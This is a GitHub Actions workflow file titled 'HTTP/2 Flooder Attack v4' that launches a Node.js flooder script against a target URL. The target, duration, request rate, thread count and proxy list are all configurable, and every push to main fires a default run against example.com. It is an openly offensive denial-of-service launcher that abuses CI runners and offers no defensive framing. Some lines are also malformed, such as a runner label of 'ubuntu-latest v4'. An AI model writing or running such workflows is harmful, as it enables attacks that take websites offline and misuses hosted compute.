name: HTTP/2 Flooder Attack v4

on:
  workflow_dispatch:
    inputs:
      target:
        description: 'Target URL'
        required: true
        type: string
      time:
        description: 'Attack duration in seconds'
        required: true
        type: number
      rate:
        description: 'Requests per second'
        required: true
        type: number
      threads:
        description: 'Number of threads'
        required: true
        type: number
      proxy_file:
        description: 'Name of proxy file in repository'
        required: true
        type: string
        default: 'proxy.txt'
  push:
    branches: [ main ]

jobs:
  attack:
    runs-on: ubuntu-latest v4
    
    steps:
    - name: Checkout code v4
      uses: actions/checkout@v4
      
    - name: Setup Node.js v4
      uses: actions/setup-node@v4
      with:
        node-version: '18'
        
    - name: Install dependencies v4
      run: |
        npm install colors
        
    - name: Run HTTP/2 Flooder attack v4
      run: |
        node flooder.js ${{ inputs.target }} ${{ inputs.time }} ${{ inputs.rate }} ${{ inputs.threads }} ${{ inputs.proxy_file }}
      if: ${{ github.event_name == 'workflow_dispatch' }}
      
    - name: Run default attack v4
      run: |
        node flooder.js https://example.com 60 10 5 proxy.txt
      if: ${{ github.event_name != 'workflow_dispatch' }}
